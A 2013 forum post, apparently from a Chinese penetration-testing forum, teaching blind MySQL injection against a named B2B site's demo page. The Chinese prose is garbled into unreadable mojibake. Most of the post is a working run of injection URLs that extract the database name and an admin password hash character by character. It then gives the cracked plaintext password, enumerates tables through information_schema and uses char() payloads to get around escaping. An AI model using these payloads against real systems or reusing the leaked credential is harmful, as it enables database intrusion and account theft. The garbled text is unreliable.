MySQLÃ¤×¢×îÈ« ÊµÀý½²½â Ïê½â

admin ·¢±íÓÚ 2013-9-25 13:52:56

±¾ÎÄÊµÀýÀ´×ÔÏ°¿ÆÂÛÌ³½»Á÷ÈýÈº¡£Õâ¸ö×¢Èëµã¿ÉÒÔÊ¹ÓÃ´íÎó»ØÏÔ×¢ÈëÀ´±¬Êý¾Ý£¬±¾ÎÄ³öÓÚ½²½âµÄÄ¿µÄ£¬Ê¹ÓÃ¸üÂé·³µÄÃ¤×¢¡£
ÔÄ¶Á±¾ÎÄ£¬ÐèÒªÓÐÒ»µãµãSQL»ù´¡¡£Ã¤×¢Àí½âÆðÀ´ÆäÊµ·Ç³£¼òµ¥£¬¾ÍÊÇ×öÆðÀ´·Ç³£·Ñ¾¢
×÷Õß£ºYoCo Smart
À´×Ô£ºÏ°¿ÆÐÅÏ¢¼¼Êõ - http://BlackBap.Org
ÎÒÃÇÏÈÀ´¿´×¢Èëµã£¬ÊÇÒ»¸öB2BÍøÕ¾½¨Õ¾¹«Ë¾£º
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin
[*]ÓÃ»§ÃûÒÑ±»×¢²á
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'
[*]select userid from demo_b2b_member where user = 'admin''You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1

¸´ÖÆ´úÂë
´íÎóÌáÊ¾ÒÑ¾ºÜÃ÷ÁËÁË¡£ÎÒÃÇ¿´Ò»ÏÂ×¢ÈëÒ³ÃæµÄ´úÂë£¨ÓÐÉ¾¸Ä£©£º
[*]$js_user = trim($_GET["js_user"]);
[*]if($js_user){
[*]$num = $db->num_rows("select userid from demo_b2b_member where user = '$js_user'");
[*]if(!$num)
[*]echo "<div class=tips3></div>";
[*]else
[*]echo "<div class=tips2>ÓÃ»§ÃûÒÑ±»×¢²á</div>";
[*]}

¸´ÖÆ´úÂë
ÒÔGET·½Ê½È¡ÖµµÄ±äÁ¿js_userËäÈ»Ã»ÓÐ¹ýÂË±»Ö±½Ó´øÈëÁËÊý¾Ý¿âÖ´ÐÐ£¬²¢ÇÒMySQLÒ²Ö´ÐÐÁË£¬µ«ÊÇ²¢Ã»ÓÐÏÔÊ¾Êý¾Ý¿âµÄÈÎºÎÐÅÏ¢£¬¶øÊÇÅÐ¶ÏÊÇ·ñ·ûºÏ
ÄÇÃ´ÎÒÃÇÏÈ´ÓunionµÄÃ¤×¢À´¿´°É¡£
ÏÈ¿´°æ±¾£º
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(version(),1)=5%23

¸´ÖÆ´úÂë
Õâ¸öÊ±ºòÎÒÃÇÀ´¿´¿´ÔÀ´µÄ´úÂëÖÐµÄSQLÓï¾äÊÇÔõÃ´Ö´ÐÐµÄ£º
[*]select userid from demo_b2b_member where user = 'admin'and left(version(),1)=5#'

¸´ÖÆ´úÂë
ÒòÎªÖ´ÐÐ³É¹¦£¬ËùÒÔ²»·ûºÏif(!$num)Õâ¸öÌõ¼þ£¬»ØÏÔ¡°ÓÃ»§ÃûÒÑ±»×¢²á¡±£¬ÄÇÃ´°æ±¾Îª5³ÉÁ¢
ÔÙÀ´¿´database()µÄÊý¾Ý£º
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length(database())=6%23
[*]database()³¤¶È6
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),1)='l'%23
[*]l
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),2)='li'%23
[*]li
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),3)='lic'%23
[*]lic
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),4)='licl'%23
[*]licl
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),5)='licln'%23
[*]licln
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(database(),6)='liclny'%23
[*]licclny

¸´ÖÆ´úÂë
length()º¯ÊýÊÇ¼ÆËãÀ¨ºÅÖÐÊý¾ÝµÄ³¤¶È£¬»ØÏÔÎª´¿Êý×Ö£¬¿ÉÒÔÓÃ´óÓÚÐ¡ÓÚºÍµÈÓÚºÅÀ´ÅÐ¶ÏÊÇ·ñÕýÈ·¡£
ÕâÀïÒª×¢Òâ¿´Ò»ÏÂleft()º¯ÊýÖÐµÄÊý×Ö±ä»¯£¬¹ØÓÚleft()º¯Êý£¬¿ÉÒÔ×ÔÐÐ²Î¿¼MySQLÊÖ²á¡£
ÔÙÀ´¿´Ò»µã¼òµ¥µÄÅÐ¶Ï¾ä£º
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length(pass)=32%23
[*]select userid from demo_b2b_member where user = 'admin'and length(pass)=32#'

¸´ÖÆ´úÂë
Õâ¸öÊ±ºòlength()º¯ÊýÖÐµÄpassÊÇ²Â²âµÄ£¬µ±È»ÊÇ½¨Á¢ÔÚ²Â²âÕýÈ·µÄ»ù´¡ÉÏ¡£
ÕâÀïÒªËµµÄÊÇ£¬passºÍÇ°ÃæselectºóµÄuseridÍ¬ÊôÒ»¸ö±í¶Îdemo_b2b_admin£¬ËùÒÔ²»ÐèÒªÔÙ´øselectÓï¾ä
ÄÇÃ´ÕâÀï¾ÍÄÜµÃµ½£º
[*]ÕâÀï×îºóÃ»ÓÐ'#Õâ¸öÖÕÖ¹·û£¬´ó¼Ò´ø½øÈ¥¿´Ò»ÏÂ£¬ÄãÃÇ¶®µÃ¡£Ç°¿ªºó±Õ¡£
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,1)='0
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,2)='04
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,3)='048
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,4)='0484
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,5)='04843
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,6)='04843e
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,7)='04843e9
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,8)='04843e9f
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,9)='04843e9f9
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,10)='04843e9f91
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,11)='04843e9f91a
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,12)='04843e9f91ad
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,13)='04843e9f91adf
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,14)='04843e9f91adf2
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,15)='04843e9f91adf22
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,16)='04843e9f91adf228
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,17)='04843e9f91adf2287
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,18)='04843e9f91adf2287c
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,19)='04843e9f91adf2287c0
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,20)='04843e9f91adf2287c0a
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,21)='04843e9f91adf2287c0af
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,22)='04843e9f91adf2287c0af5
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,23)='04843e9f91adf2287c0af5f
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,24)='04843e9f91adf2287c0af5fe
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,25)='04843e9f91adf2287c0af5fe1
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,26)='04843e9f91adf2287c0af5fe16
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,27)='04843e9f91adf2287c0af5fe167
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,28)='04843e9f91adf2287c0af5fe1675
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,29)='04843e9f91adf2287c0af5fe16750
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,30)='04843e9f91adf2287c0af5fe16750a
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,31)='04843e9f91adf2287c0af5fe16750a3
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+left(pass,32)='04843e9f91adf2287c0af5fe16750a35
[*]³¤¶ÈÊÇ32£¬ÊÇmd5¼ÓÃÜ£¬½âÃÜµÃµ½lcl2wly

¸´ÖÆ´úÂë
ÕâÑù£¬²ÂÊý¾ÝµÄ·½·¨Äã¿Ï¶¨ÊÇ¶®ÁË

×îºó£¬ÎÒÃÇÀ´¿´demo_b2b_adminÒÔÍâµÄÊý¾Ý£¬ÏÖÔÚÔÙÀ´²Â±í¶Î£º
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length((select+table_name+from+information_schema.tables+limit+0,1))<100%23
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+length((select+table_name+from+information_schema.tables+limit+0,1))=14%23

¸´ÖÆ´úÂë
Êµ¼ÊÔËÐÐµÄSQLÓï¾ä¾ÍÊÇ£º
[*]select userid from demo_b2b_member where user = 'admin'and length((select table_name from information_schema.tables limit 0,1))=14#'

¸´ÖÆ´úÂë
ÉÏÃæÕâ¸öÓï¾ä£¬¶ÔÓÚinformation_schema²»Ã÷°×µÄ£¬¿ÉÒÔ²Î¿¼ÆäËûMySQL×¢ÈëÎÄÕÂÀ´¿´Ò»ÏÂÕâ¸ö¿âµÄÒâÒå¡£
¹ØÓÚlimit x,y µÄÓÃ·¨£¬¿ÉÒÔ²Î¿¼MySQLÊÖ²á

×îºóÊ£ÏÂµÄÒªËµµÄ¾ÍÊÇasciiº¯ÊýºÍhexº¯ÊýÁË
ÕâÁ½¸öº¯ÊýµÄÒâÒåÊÇ±Ü¿ªphpµÄGPC×ªÒå£¬ÀýÈç£º
[*]http://www.smartb2b.net/demo/b2b/member/check.php?js_user=admin'and+substr(left(pass,1),1,1)=char(48)%23
[*]select userid from demo_b2b_member where user = 'admin'and substr(pass,1,1)=char(48)#

¸´ÖÆ´úÂë
substr()µÄÓÃ·¨¿ÉÒÔ²Î¿¼MySQLÊÖ²á£¬Èç¹û²»¶®£¬¾ÍÕâÑùÌ×ºÃÁË¡£Char()ÀïÃæµÄÊý×ÖÌæ»»ÎªasciiÂëÊý×Ö

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

MySQLÃ¤×¢×îÈ« ÊµÀý½²½â Ïê½â